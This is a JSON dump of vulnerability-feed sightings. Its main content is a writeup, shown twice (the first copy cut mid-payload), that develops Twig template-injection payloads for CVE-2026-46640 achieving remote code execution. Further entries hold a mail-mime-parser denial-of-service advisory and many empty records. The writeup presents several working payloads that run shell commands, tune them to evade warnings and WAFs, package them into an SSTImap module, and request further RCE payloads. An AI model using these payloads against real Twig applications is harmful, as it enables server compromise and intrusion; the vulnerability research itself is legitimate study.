1);call_user_func(shell_exec('id'));}function a(){//\")}}\n```\n\nI also used the same payload idea to create **Time-Based Blind** payload:\n\n```php\n{{_self.(\";}function __destruct(){system('id &amp;&amp; sleep 5');}function a(){//\")}}\n```\n\n## Second payload\n\nThe previous approach of bypassing the error does not prevent rendering from breaking.\n**Boolean Error-Based Blind** exploitation would be more stable if the page would be rendered normally.\n\nThe fatal error is caused by `getTemplateForMacro` function defined in the parent `Twig` class.\nThis allows us to override this function inside our injected code:\n\n```php\n{{_self.(\";}function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis already works, printing the command output, but generates a warning.\nThis is bad, as it might break automatic detection or cause some WAF to block the response.\nThe warning can be removed by defining a variable called `$macro_`:\n\n```php\n{{_self.(\";}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis payload gives us a form of rendered code execution, but there is still a problem.\nIf we only control a part of the template (e.g. using SSTI), the part after our payload will not be rendered.\n\nWe already captured the rest of the rendering function inside our unused function `a()`.\nTo finish the rendering process we can use `yield from` syntax:\n\n```php\n{{_self.(\";yield from $this-&gt;a();}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis payload was used for **Rendered** and **Boolean Error-Based Blind** payloads in my SSTImap module.\n\nWhile writing this writeup, I discovered another problem.\nThis payload overrides the `getTemplateForMacro` function and so will break the rendering of real macros.\n\nTo fix that, we can add a keyword inside the comment and call `parent::getTemplateForMacro` if it is not present:\n\n```php\n{{_self.(\";yield from $this-&gt;a();}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{if(!str_contains($name,'sstimap')){return parent::getTemplateForMacro($name,$context,$line,$source);}system('id');return $this;}function a(){//sstimap\")}}\n```\n\nThis payload will only override `getTemplateForMacro` behaviour for macro names containing `sstimap`.\n\n## SSTImap module\n\nAdapting payloads for the SSTImap module was quite easy, since the code injection is not restricted.\nI was able to mostly reuse PHP code injection payloads as the injected code with minimal modifications.\n\nThe only problem I encountered was related to the difference between the two discovered payloads.\nI initially used a full `__destruct()`-based injection payload for file uploads.\nFor integrity verification, payload provided PHP code to be evaluated by technique-specific payloads.\n\nThis caused the problem, as the two different payloads execute injected code at different steps of the rendering.\nIf the file was uploaded to a relative path, upload and verification might be executed in different directories:\n\n- **Rendered** and **Boolean Error-Based Blind** are executed inside the website directory as part of regular rendering (as if the code was in the webpage).\n- **Error-Based** and **Time-Based Blind** payloads are executed in the working directory of the webserver, as they are triggered after a fatal error already broke rendering.\n\n## Note on CVE-2026-46633\n\nSince CVE-2026-46633 affects all prior versions, it would be a much more useful plugin.\nNot only would it provide sandbox escapes for Twig &gt;=3.3.8 &lt;3.15.0, but it would allow code injection and sandbox bypasses for older Twig versions.\nCurrently, there are no known universal payloads for Twig &gt;1.19 &lt;2.10, even for unsandboxed environments.\n\nI researched CVE-2026-46633, but I was unable to reach the execution of the injected code.\nI'm not sure if it is possible, so I will present my findings in case someone will figure it out.\nWorking RCE payloads are always welcome in PRs/issues of the [SSTImap extras](https://github.com/vladko312/extras) repo.\n\nCode injection is possible using `with ... as ...` syntax of the `{% use ... %}` tag and can be verified with a syntax error:\n\n```php\n{% use \"' test\" with a as b %}\n```\n\nThe injected payload is escaped, which breaks a lot of potential execution strategies:\n- I was unable to bypass the escaping of characters like `\"` and `$`.\n- Single quotes are not escaped, which is the source of the vulnerability.\n- Backslash-based escapes are evaluated before escaping (e.g. `\\x24` becomes `\\$`)\n\nAs in CVE-2026-46640, the code is injected inside a function after a fatal error.\n- The injection is inside the `__construct()`, so `__destruct()` is never called.\n- Escaping of `$` prevents us from defining functions with arguments.\n- I was unable to find overridable functions that would be executed.\n- Escaping class definition would require defining `doDisplay` with arguments.\n\nHere is the compiled template code, for the better understanding of the injection context:\n\n```php\n\n     */\n    private array $macros = [];\n\n    public function __construct(Environment $env)\n    {\n        parent::__construct($env);\n\n        $this-&gt;source = $this-&gt;getSourceContext();\n\n        $this-&gt;parent = false;\n\n        // line 1\n        $_trait_0 = $this-&gt;loadTemplate(\"' test\", \"tpl\", 1);\n        if (!$_trait_0-&gt;unwrap()-&gt;isTraitable()) {\n            throw new RuntimeError('Template \"'.\"' test\".'\" cannot be used as a trait.', 1, $this-&gt;source);\n        }\n        $_trait_0_blocks = $_trait_0-&gt;unwrap()-&gt;getBlocks();\n\n        if (!isset($_trait_0_blocks[\"a\"])) {\n            throw new RuntimeError('Block \"a\" is not defined in trait \"' test\".', 1, $this-&gt;source);\n        }\n\n        $_trait_0_blocks[\"b\"] = $_trait_0_blocks[\"a\"]; unset($_trait_0_blocks[\"a\"]); $this-&gt;traitAliases[\"b\"] = \"a\";\n\n        $this-&gt;traits = $_trait_0_blocks;\n\n        $this-&gt;blocks = array_merge(\n            $this-&gt;traits,\n            [\n            ]\n        );\n    }\n\n    protected function doDisplay(array $context, array $blocks = []): iterable\n    {\n        $macros = $this-&gt;macros;\n        yield from [];\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getTemplateName(): string\n    {\n        return \"tpl\";\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getDebugInfo(): array\n    {\n        return array (  35 =&gt; 1,);\n    }\n\n    public function getSourceContext(): Source\n    {\n        return new Source(\"\", \"tpl\", \"\");\n    }\n}\n```\n\nCode is unsafely injected on line 42 (only present when using `with ... as ...` syntax):\n\n```php\nthrow new RuntimeError('Block \"a\" is not defined in trait \"' test\".', 1, $this-&gt;source);\n```\n\nWithout syntax error, the execution is interrupted by fatal error caused by line 35:\n\n```php\n$_trait_0 = $this-&gt;loadTemplate(\"' test\", \"tpl\", 1);\n```\n", "creation_timestamp": "2026-06-06T23:55:29.000000Z"}, {"uuid": "f2160e75-a423-473e-9476-444db4bc785c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7p85-w9px-jpjp", "type": "seen", "source": "https://gist.github.com/vladko312/39507beaa58eacf3b62e6a6e6cd69128", "content": "# CVE-2026-46640 writeup\n\n![Report version](https://img.shields.io/badge/Report_version-1.0-purple)\n![Last modified](https://img.shields.io/badge/Last_modified-06.06.2026-purple)\n![CVE-2026-46640](https://img.shields.io/badge/CVE--2026--46640-8.7-orange)\n[![SSTImap module](https://img.shields.io/badge/SSTImap_module-extras/CVE--2026--46640-blue)](https://github.com/vladko312/extras)\n\nI recently learned about multiple sandbox bypasses discovered in Twig by project Glasswing.\nFrom the descriptions, only [CVE-2026-46640](https://github.com/advisories/GHSA-45vw-wh46-2vx8) and [CVE-2026-46633](https://github.com/advisories/GHSA-7p85-w9px-jpjp) seemed universally exploitable, so I decoded to research them.\nThis writeup documents my development of payloads for the CVE-2026-46640 and the corresponding [SSTImap](https://github.com/vladko312/sstimap) module.\n\n- [Initial observations](#initial-observations)\n- [Compiled template analysis](#compiled-template-analysis)\n- [First payload](#first-payload): base for **Error-Based** and **Time-Based Blind** payloads\n- [Second payload](#second-payload): base for **Rendered** and **Boolean Error-Based Blind** payloads\n- [SSTImap module](#sstimap-module)\n- [Note on CVE-2026-46633](#note-on-cve-2026-46633)\n\n## Initial observations\n\nFrom the descriptions, both CVE-2026-46640 and CVE-2026-46633 seemed deceptively simple.\nI decided to focus on CVE-2026-46640 first, as it did not seem to involve any escaping.\n\nSimply trying to recreate the payload from the description allowed me to confirm the presence of code injection using syntax errors:\n\n```php\n{{_self.(\" test \")}}\n```\n\nI discovered a way to avoid a syntax error, but got no code execution and the same error as for a regular text string:\n\n```php\n{{_self.(\" ;system('sleep 5');// \")}}\n```\n\nIt seems like this error occurs before the injected code is reached.\nI decided to check the generated code to better understand the injection context.\n\n## Compiled template analysis\n\n```php\n\n     */\n    private array $macros = [];\n\n    public function __construct(Environment $env)\n    {\n        parent::__construct($env);\n\n        $this-&gt;source = $this-&gt;getSourceContext();\n\n        $this-&gt;parent = false;\n\n        $this-&gt;blocks = [\n        ];\n    }\n\n    protected function doDisplay(array $context, array $blocks = []): iterable\n    {\n        $macros = $this-&gt;macros;\n        // line 1\n        yield $this-&gt;getTemplateForMacro(\"macro_ ;system('sleep 5');// \", $context, 1, $this-&gt;getSourceContext())-&gt;macro_ ;system('sleep 5');// (...[]);\n        yield from [];\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getTemplateName(): string\n    {\n        return \"tpl\";\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function isTraitable(): bool\n    {\n        return false;\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getDebugInfo(): array\n    {\n        return array (  42 =&gt; 1,);\n    }\n\n    public function getSourceContext(): Source\n    {\n        return new Source(\"\", \"tpl\", \"\");\n    }\n}\n```\n\nAs you might notice, the only two places, where the payload is used, are in the same line of code inside `doDisplay` function:\n\n```php\nyield $this-&gt;getTemplateForMacro(\"macro_ ;system('sleep 5');// \", $context, 1, $this-&gt;getSourceContext())-&gt;macro_ ;system('sleep 5');// (...[]);\n```\n\nThe first time, our payload is correctly escaped inside the string, but the second injection point allows arbitrary code.\nThe injected code is not executed, since `getTemplateForMacro` right before it causes a fatal error.\n\n## First payload\n\nSince our code inside `doDisplay` will never be reached, we need to escape the context of that function and inject the code there.\nFully escaping the class definition would be possible, but it would make the payload very long.\n\nAs a result, I decided to try injecting a function inside the generated class.\nThe part after the injection contains `yield`, turning that function into a generator.\nSince a lot of useful overridable functions can't be generators, I added an unused second function.\n\nFor a simple payload I decided to use `__destruct()`, as the object will be destroyed after the error:\n\n```php\n{{_self.(\";}function __destruct(){system('id');}function a(){//\")}}\n```\n\nThis payload worked and printed the command output after the error message.\nSince PHP allows changing error visibility inside dhe code, I made a proper **Error-Based** payload:\n\n```php\n{{_self.(\";}function __destruct(){error_reporting(1);ini_set('display_errors', 1);call_user_func(shell_exec('id'));}function a(){//\")}}\n```\n\nI also used the same payload idea to create **Time-Based Blind** payload:\n\n```php\n{{_self.(\";}function __destruct(){system('id &amp;&amp; sleep 5');}function a(){//\")}}\n```\n\n## Second payload\n\nThe previous approach of bypassing the error does not prevent rendering from breaking.\n**Boolean Error-Based Blind** exploitation would be more stable if the page would be rendered normally.\n\nThe fatal error is caused by `getTemplateForMacro` function defined in the parent `Twig` class.\nThis allows us to override this function inside our injected code:\n\n```php\n{{_self.(\";}function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis already works, printing the command output, but generates a warning.\nThis is bad, as it might break automatic detection or cause some WAF to block the response.\nThe warning can be removed by defining a variable called `$macro_`:\n\n```php\n{{_self.(\";}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis payload gives us a form of rendered code execution, but there is still a problem.\nIf we only control a part of the template (e.g. using SSTI), the part after our payload will not be rendered.\n\nWe already captured the rest of the rendering function inside our unused function `a()`.\nTo finish the rendering process we can use `yield from` syntax:\n\n```php\n{{_self.(\";yield from $this-&gt;a();}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{system('id');return $this;}function a(){//\")}}\n```\n\nThis payload was used for **Rendered** and **Boolean Error-Based Blind** payloads in my SSTImap module.\n\nWhile writing this writeup, I discovered another problem.\nThis payload overrides the `getTemplateForMacro` function and so will break the rendering of real macros.\n\nTo fix that, we can add a keyword inside the comment and call `parent::getTemplateForMacro` if it is not present:\n\n```php\n{{_self.(\";yield from $this-&gt;a();}public $macro_='';function getTemplateForMacro(string $name,array $context,int $line,Twig\\\\Source $source):Twig\\\\Template{if(!str_contains($name,'sstimap')){return parent::getTemplateForMacro($name,$context,$line,$source);}system('id');return $this;}function a(){//sstimap\")}}\n```\n\nThis payload will only override `getTemplateForMacro` behaviour for macro names containing `sstimap`.\n\n## SSTImap module\n\nAdapting payloads for the SSTImap module was quite easy, since the code injection is not restricted.\nI was able to mostly reuse PHP code injection payloads as the injected code with minimal modifications.\n\nThe only problem I encountered was related to the difference between the two discovered payloads.\nI initially used a full `__destruct()`-based injection payload for file uploads.\nFor integrity verification, payload provided PHP code to be evaluated by technique-specific payloads.\n\nThis caused the problem, as the two different payloads execute injected code at different steps of the rendering.\nIf the file was uploaded to a relative path, upload and verification might be executed in different directories:\n\n- **Rendered** and **Boolean Error-Based Blind** are executed inside the website directory as part of regular rendering (as if the code was in the webpage).\n- **Error-Based** and **Time-Based Blind** payloads are executed in the working directory of the webserver, as they are triggered after a fatal error already broke rendering.\n\n## Note on CVE-2026-46633\n\nSince CVE-2026-46633 affects all prior versions, it would be a much more useful plugin.\nNot only would it provide sandbox escapes for Twig &gt;=3.3.8 &lt;3.15.0, but it would allow code injection and sandbox bypasses for older Twig versions.\nCurrently, there are no known universal payloads for Twig &gt;1.19 &lt;2.10, even for unsandboxed environments.\n\nI researched CVE-2026-46633, but I was unable to reach the execution of the injected code.\nI'm not sure if it is possible, so I will present my findings in case someone will figure it out.\nWorking RCE payloads are always welcome in PRs/issues of the [SSTImap extras](https://github.com/vladko312/extras) repo.\n\nCode injection is possible using `with ... as ...` syntax of the `{% use ... %}` tag and can be verified with a syntax error:\n\n```php\n{% use \"' test\" with a as b %}\n```\n\nThe injected payload is escaped, which breaks a lot of potential execution strategies:\n- I was unable to bypass the escaping of characters like `\"` and `$`.\n- Single quotes are not escaped, which is the source of the vulnerability.\n- Backslash-based escapes are evaluated before escaping (e.g. `\\x24` becomes `\\$`)\n\nAs in CVE-2026-46640, the code is injected inside a function after a fatal error.\n- The injection is inside the `__construct()`, so `__destruct()` is never called.\n- Escaping of `$` prevents us from defining functions with arguments.\n- I was unable to find overridable functions that would be executed.\n- Escaping class definition would require defining `doDisplay` with arguments.\n\nHere is the compiled template code, for the better understanding of the injection context:\n\n```php\n\n     */\n    private array $macros = [];\n\n    public function __construct(Environment $env)\n    {\n        parent::__construct($env);\n\n        $this-&gt;source = $this-&gt;getSourceContext();\n\n        $this-&gt;parent = false;\n\n        // line 1\n        $_trait_0 = $this-&gt;loadTemplate(\"' test\", \"tpl\", 1);\n        if (!$_trait_0-&gt;unwrap()-&gt;isTraitable()) {\n            throw new RuntimeError('Template \"'.\"' test\".'\" cannot be used as a trait.', 1, $this-&gt;source);\n        }\n        $_trait_0_blocks = $_trait_0-&gt;unwrap()-&gt;getBlocks();\n\n        if (!isset($_trait_0_blocks[\"a\"])) {\n            throw new RuntimeError('Block \"a\" is not defined in trait \"' test\".', 1, $this-&gt;source);\n        }\n\n        $_trait_0_blocks[\"b\"] = $_trait_0_blocks[\"a\"]; unset($_trait_0_blocks[\"a\"]); $this-&gt;traitAliases[\"b\"] = \"a\";\n\n        $this-&gt;traits = $_trait_0_blocks;\n\n        $this-&gt;blocks = array_merge(\n            $this-&gt;traits,\n            [\n            ]\n        );\n    }\n\n    protected function doDisplay(array $context, array $blocks = []): iterable\n    {\n        $macros = $this-&gt;macros;\n        yield from [];\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getTemplateName(): string\n    {\n        return \"tpl\";\n    }\n\n    /**\n     * @codeCoverageIgnore\n     */\n    public function getDebugInfo(): array\n    {\n        return array (  35 =&gt; 1,);\n    }\n\n    public function getSourceContext(): Source\n    {\n        return new Source(\"\", \"tpl\", \"\");\n    }\n}\n```\n\nCode is unsafely injected on line 42 (only present when using `with ... as ...` syntax):\n\n```php\nthrow new RuntimeError('Block \"a\" is not defined in trait \"' test\".', 1, $this-&gt;source);\n```\n\nWithout syntax error, the execution is interrupted by fatal error caused by line 35:\n\n```php\n$_trait_0 = $this-&gt;loadTemplate(\"' test\", \"tpl\", 1);\n```\n", "creation_timestamp": "2026-06-06T23:55:29.000000Z"}, {"uuid": "7a29a4e5-7daa-4873-b005-67174881ba6b", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6V53-HR58-556R", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/87df996f-d392-4a84-a8ce-59565a65625f", "content": "", "creation_timestamp": "2026-09-10T08:18:29.116237Z"}, {"uuid": "1f89aff9-aa76-4e3f-a686-ad504dc44ad3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f6v3-2qmr-vfjx", "type": "seen", "source": "https://gist.github.com/alon710/752908b52d1b5f088fc141196f91ca9b", "content": "# CVE-2026-61816: CVE-2026-61816: Uncontrolled Resource Consumption and Algorithmic Complexity in zbateson/mail-mime-parser\n\n&gt; **CVSS Score:** 7.5\n&gt; **Published:** 2026-09-24\n&gt; **Full Report:** https://cvereports.com/reports/CVE-2026-61816\n\n## Summary\nThe PHP email processing library zbateson/mail-mime-parser is vulnerable to multiple algorithmic complexity exploits. By submitting small, highly structured email payloads, remote, unauthenticated attackers can trigger high CPU utilization or out-of-memory states, causing an application-wide denial of service.\n\n## TL;DR\nA denial of service vulnerability in zbateson/mail-mime-parser allows unauthenticated remote attackers to trigger severe CPU exhaustion or out-of-memory crashes by submitting malformed emails under 2 MB containing deeply nested boundaries, large header lists, or dense sibling attachments.\n\n## Exploit Status: POC\n\n## Technical Details\n\n- **CWE ID**: CWE-400\n- **Attack Vector**: Network (AV:N)\n- **CVSS Score**: 7.5 (High)\n- **Impact**: Denial of Service (DoS)\n- **Exploit Status**: Proof of Concept (PoC)\n- **KEV Status**: Not Listed\n\n## Affected Systems\n\n- zbateson/mail-mime-parser (PHP Package)\n- **mail-mime-parser**: &gt;= 2.0.0, &lt; 3.0.6 (Fixed in: `3.0.6`)\n- **mail-mime-parser**: &gt;= 4.0.0, &lt; 4.0.2 (Fixed in: `4.0.2`)\n\n## Mitigation\n\n- Update zbateson/mail-mime-parser to versions 3.0.6, 4.0.2, or newer.\n- Impose global constraints on memory_limit and max_execution_time within the PHP runtime configuration.\n- Deploy proxy-level or mail-transfer-agent (MTA) validation rules to drop exceptionally deep MIME hierarchies.\n\n**Remediation Steps:**\n1. Run 'composer update zbateson/mail-mime-parser' to download version 3.0.6 or 4.0.2.\n2. Review custom DI container setups to ensure they inherit the default values for 'maxMimePartDepth', 'maxHeaderCount', and 'maxHeaderSizeBytes'.\n3. Set 'memory_limit' to a conservative threshold (e.g. 128M) in php.ini to contain potential OOM outcomes.\n\n## References\n\n- [GHSA-f6v3-2qmr-vfjx: Uncontrolled resource consumption / algorithmic complexity DoS](https://github.com/zbateson/mail-mime-parser/security/advisories/GHSA-f6v3-2qmr-vfjx)\n- [CVE.org CVE-2026-61816 Vulnerability Record](https://www.cve.org/CVERecord?id=CVE-2026-61816)\n- [NVD - CVE-2026-61816 Analysis Dashboard](https://nvd.nist.gov/vuln/detail/CVE-2026-61816)\n- [Primary Configuration Limits and Depth Check Commit](https://github.com/zbateson/mail-mime-parser/commit/1691e695821f70461f9554e9bb71be2859404a24)\n- [Sibling Append Splice Optimization Commit](https://github.com/zbateson/mail-mime-parser/commit/fa44823ba9dd651e0eecec7aa45ac8c8e6afcb78)\n- [Release 3.0.7 GitHub Tag](https://github.com/zbateson/mail-mime-parser/releases/tag/3.0.7)\n- [Release 4.0.2 GitHub Tag](https://github.com/zbateson/mail-mime-parser/releases/tag/4.0.2)\n\n\n---\n*Generated by [CVEReports](https://cvereports.com/reports/CVE-2026-61816) - Automated Vulnerability Intelligence*", "creation_timestamp": "2026-09-25T07:30:34.000000Z"}, {"uuid": "7015baa4-0ff6-4649-9c38-4f0340d1857b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-8v8h-hg4w-mvq2", "type": "seen", "source": "https://gist.github.com/alon710/256195b8da831d2851e64a796d5d077f", "content": "", "creation_timestamp": "2026-09-25T08:30:31.000000Z"}, {"uuid": "bc6c67e2-5ea3-47bf-ac5d-4bba8a871040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jmg2-rcxh-w8q3", "type": "seen", "source": "https://gist.github.com/alon710/2ea4939fe39aae49f94968fc1d98881b", "content": "", "creation_timestamp": "2026-09-25T09:30:31.000000Z"}, {"uuid": "04c57506-ed66-4535-9179-075033fb9292", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4hq8-gpf5-8p68", "type": "seen", "source": "https://gist.github.com/alon710/1c4b6cbb0ddd0180b37c1412f848c33e", "content": "", "creation_timestamp": "2026-09-25T10:30:33.000000Z"}, {"uuid": "b8394b3b-9c19-4b8c-9244-90ab6bea76d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w7c2-w76w-5hmj", "type": "seen", "source": "https://gist.github.com/alon710/ede21d9eee467eb023b3dac26fbd4240", "content": "", "creation_timestamp": "2026-09-25T11:30:32.000000Z"}, {"uuid": "abc8615d-bb65-40eb-9b84-5ffca2f231cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "seen", "source": "Telegram/hn_cbtJg35y3a8ky1wWtlHg_HSsW2-9wCiZ6CQmYLspAD7Q", "content": "", "creation_timestamp": "2026-09-24T11:27:23.000000Z"}, {"uuid": "4ef26116-11f4-40bc-8a5a-b09bc058ccc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-VCVR-R3JV-PC5J", "type": "seen", "source": "Telegram/casOb_urBwXkBUZvllR9Y1soseAr2u2g5tENUUxRQxBEAPw", "content": "", "creation_timestamp": "2026-09-24T03:00:06.000000Z"}, {"uuid": "82f221cb-470e-4fdd-8880-ac962e0f824b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WX4J-MVGX-MQWP", "type": "seen", "source": "Telegram/casOb_urBwXkBUZvllR9Y1soseAr2u2g5tENUUxRQxBEAPw", "content": "", "creation_timestamp": "2026-09-24T03:00:06.000000Z"}, {"uuid": "5f8537fa-dad7-48de-ae28-d40266987675", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HP8-65CH-5WHP", "type": "seen", "source": "Telegram/vqsPZgWgWmhUgO5aL_wpY6AtnbvKlpjOuzz_MF4q41HEYi4", "content": "", "creation_timestamp": "2026-09-23T15:00:06.000000Z"}, {"uuid": "6567e4f1-895f-4565-9dd5-5730c8c06460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vj8p-hp9x-gh47", "type": "seen", "source": "https://gist.github.com/alon710/7677ed04750b8404bd2e33c234999538", "content": "", "creation_timestamp": "2026-09-26T00:30:32.000000Z"}, {"uuid": "0b4a21e7-b014-4186-a7ec-2a9ec245f69a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QPXH-FF8M-C62V", "type": "seen", "source": "https://gist.github.com/alon710/9d482eefcb1d44ed932ab0b5e9532492", "content": "", "creation_timestamp": "2026-09-26T01:30:32.000000Z"}, {"uuid": "a2c151af-f59f-4a77-863f-2a44cb43c6d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vv77-66rf-pm86", "type": "seen", "source": "https://gist.github.com/alon710/adff81b2c4a6294016a88ba9a567b65e", "content": "", "creation_timestamp": "2026-09-26T02:30:32.000000Z"}, {"uuid": "70aebc40-7880-48ca-99ae-3cee55b2d67b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wrvw-254r-wpmv", "type": "seen", "source": "https://gist.github.com/alon710/3bf978c1c1d2c0f47957618ee41a82fa", "content": "", "creation_timestamp": "2026-09-26T03:30:31.000000Z"}, {"uuid": "de54ae1c-6271-4b3b-a14b-5e13abd3b761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j73w-8hfr-4gc9", "type": "seen", "source": "https://gist.github.com/alon710/2d1e9d9adea50782a3aa28ba496e0855", "content": "", "creation_timestamp": "2026-09-26T04:30:32.000000Z"}, {"uuid": "1d199d86-b6bd-4ae3-ac4c-088d4e59f96d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-62MM-XWMV-CRHG", "type": "seen", "source": "https://gist.github.com/alon710/cd808a0773f21e3705390b5760dfe75e", "content": "", "creation_timestamp": "2026-09-26T05:30:29.000000Z"}, {"uuid": "399158b7-101a-41c5-99e5-8477660674e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3f39-6537-3cgc", "type": "seen", "source": "https://bsky.app/profile/Yuno.serafuku.moe.ap.brid.gy/post/3mwfmalf3i5a2", "content": "", "creation_timestamp": "2026-09-26T06:00:41.617511Z"}, {"uuid": "e9d8f517-aee4-4e48-b63b-d3e19b848a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-38jx-423m-g387", "type": "seen", "source": "https://bsky.app/profile/Yuno.serafuku.moe.ap.brid.gy/post/3mwfla43xid42", "content": "", "creation_timestamp": "2026-09-26T05:44:53.069529Z"}, {"uuid": "e06c8d33-86ea-4681-8a54-e40ae483094b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r33c-qg3g-v9cr", "type": "seen", "source": "https://bsky.app/profile/Yuno.serafuku.moe.ap.brid.gy/post/3mwfl3skuhfo2", "content": "", "creation_timestamp": "2026-09-26T05:40:04.293802Z"}, {"uuid": "bf6e2e6a-53fb-4a4b-a18e-25e20100be4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pg57-6jwg-q645", "type": "seen", "source": "https://gist.github.com/alon710/a28d447f907845848dd908acc002c8d7", "content": "", "creation_timestamp": "2026-09-26T06:30:31.000000Z"}, {"uuid": "d76885c0-f396-46f8-a98f-4164671b1c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2mjx-qc3c-rqvc", "type": "seen", "source": "https://gist.github.com/citadelculture/7a82e9f9aea119e1eacf3eb5399678eb", "content": "", "creation_timestamp": "2026-09-26T10:53:49.000000Z"}, {"uuid": "5a78f590-52a8-4a7d-be8e-d590e02a9adc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxgx-6p4m-fv83", "type": "seen", "source": "https://bsky.app/profile/synergyapp.bsky.social/post/3mwh6jm6x4e2c", "content": "", "creation_timestamp": "2026-09-26T21:00:25.505253Z"}, {"uuid": "bc3e6f02-57f0-4d61-961b-b6fb41933220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jr4-wrm2-xj36", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113442874348339740", "content": "", "creation_timestamp": "2024-11-07T17:34:50.779533Z"}, {"uuid": "a3ee1bdc-073d-49ee-be6a-74526a87aec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9mq5-349x-x427", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113443005858730142", "content": "", "creation_timestamp": "2024-11-07T18:08:17.543564Z"}, {"uuid": "acda641b-d1b9-46ac-a531-0fd078b2c7e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjph-c25g-5c7g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113443005872447427", "content": "", 